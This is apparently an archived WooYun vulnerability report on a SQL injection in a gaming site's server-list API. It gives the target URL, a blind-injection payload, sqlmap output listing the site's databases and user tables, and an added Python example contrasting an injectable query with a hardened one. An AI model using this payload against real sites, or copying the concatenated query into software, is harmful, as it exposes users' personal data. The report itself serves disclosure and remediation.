WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2015-11-30: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly. 2016-01-14: The vendor has actively ignored the vulnerability; details disclosed to the public.
As in the title.
Injection address
#SQL injection URL: http://www.96wan.com/websiteapi/website_serverlist?gid=6 ; the gid parameter is user-controllable
Six databases disclosed
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gid=6 AND 1429=1429
---
back-end DBMS: MySQL 5
available databases [6]:
[*] `96wan_ucenter`
[*] `96wan_web` // main site database
[*] `96wan_wp`
[*] information_schema
[*] mysql
[*] performance_schema
# Without going deeper, just query the main database's information (the member table leaks sensitive information, 300,000 records)
Database: 96wan_web
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| `96wan_game_log`        | 4680784 |
| `96wan_login_log`       | 3916792 |
| `96wan_member_info`     |  309322 |
| `96wan_register_log`    |  308966 |
| `96wan_newcard`         |  155681 |
| `96wan_newcard2`        |  150832 |
| `96wan_channel_member`  |   93985 |
| `96wan_pay_log`         |   75946 |
| `96wan_pay_ok`          |   44113 |
| `96wan_pay_togame`      |   44113 |
| ku36_game_log           |   31458 |
| `96wan_code_log`        |   19938 |
| `96wan_lhzs_card`       |   12349 |
| ku36_member_info        |    4924 |
| `96wan_channel_info`    |    3797 |
| `96wan_area`            |    3144 |
| `96wan_verify_email`    |    1901 |
| `96wan_game_server`     |     622 |
| `96wan_forgetpwd`       |     404 |
| `96wan_channel`         |     380 |
| `96wan_city`            |     340 |
| `96wan_article`         |     311 |
| `96wan_access`          |     197 |
| `96wan_friendlink`      |     114 |
| `96wan_union_channel`   |     102 |
| `96wan_password_appeal` |      97 |
| `96wan_lhzs_usecard`    |      96 |
| `96wan_node`            |      82 |
| `96wan_test_account`    |      50 |
| `96wan_phone_code_log`  |      46 |
| `96wan_union_members`   |      40 |
| `96wan_province`        |      34 |
| `96wan_channel_source`  |      33 |
| `96wan_game`            |      25 |
| `96wan_pay_type`        |      20 |
| `96wan_slidepic`        |      19 |
| `96wan_role_user`       |      17 |
| `96wan_tg_pass`         |      16 |
| `96wan_pay_test`        |      12 |
| `96wan_notice`          |       7 |
| `96wan_singlepage`      |       7 |
| `96wan_group`           |       6 |
| `96wan_channel_ts`      |       5 |
| `96wan_role`            |       5 |
| `96wan_user`            |       4 |
| `96wan_category`        |       3 |
| `96wan_dept`            |       3 |
| `96wan_groups`          |       3 |
| `96wan_union`           |       2 |
| `96wan_card`            |       1 |
| `96wan_code`            |       1 |
| `96wan_phone_code`      |       1 |
| `96wan_sygame`          |       1 |
| `96wan_tg_paytype`      |       1 |
+-------------------------+---------+
The parameter is user-controllable; developers, filter it.
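As an added example that is not part of this report or of 96wan's own code, the following Python contrasts the two handler shapes the report is about: the injectable one, where the gid value is spliced into the SQL text, and a fixed one that allow-lists gid as a plain integer and binds it as a query parameter. The table, column names and sample rows are constructed assumptions, and sqlite3 stands in for the MySQL backend; the "6 AND 1429=1429" value is the boolean-blind payload quoted in the sqlmap output above.

```python
import re
import sqlite3


def make_sample_db():
    """Constructed in-memory table standing in for whatever backs website_serverlist.
    Table name, columns and rows are assumptions for the illustration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE game_server (id INTEGER, gid INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO game_server VALUES (?, ?, ?)",
        [(1, 6, "server-1"), (2, 6, "server-2"), (3, 7, "server-3")],
    )
    return conn


def serverlist_vulnerable(conn, gid):
    """The injectable pattern: the raw query-string value becomes part of the SQL text,
    so a value such as '6 AND 1429=1429' rewrites the WHERE clause instead of being data."""
    sql = "SELECT id, name FROM game_server WHERE gid = " + gid
    return conn.execute(sql).fetchall()


class BadParameter(ValueError):
    """Raised when gid is not a plain decimal integer."""


_GID_RE = re.compile(r"[0-9]{1,10}")


def serverlist_hardened(conn, gid):
    """Fixed pattern: gid is an ID, so only digits are accepted (allow-list), and the
    value is bound as a parameter, so it can never change the query structure."""
    if not _GID_RE.fullmatch(gid):
        raise BadParameter("gid must be a decimal integer")
    sql = "SELECT id, name FROM game_server WHERE gid = ?"
    return conn.execute(sql, (int(gid),)).fetchall()


def compare():
    """Run both handlers on a normal request and on the boolean-blind payload and its
    constructed false counterpart; return row counts so the difference is visible."""
    conn = make_sample_db()
    true_cond = "6 AND 1429=1429"   # payload quoted in the report's sqlmap output
    false_cond = "6 AND 1429=1430"  # constructed false condition for comparison
    result = {
        # The vulnerable handler answers differently for true and false conditions:
        # that response difference is exactly what boolean-based blind injection reads.
        "vulnerable_true": len(serverlist_vulnerable(conn, true_cond)),
        "vulnerable_false": len(serverlist_vulnerable(conn, false_cond)),
        "hardened_normal": len(serverlist_hardened(conn, "6")),
    }
    try:
        serverlist_hardened(conn, true_cond)
        result["hardened_rejects_payload"] = False
    except BadParameter:
        result["hardened_rejects_payload"] = True
    return result


if __name__ == "__main__":
    print(compare())
```

The allow-list check alone would already stop this payload, but the parameter binding is the part that holds even when a field is legitimately free text, which is why the fix uses both rather than relying on filtering the input.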
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)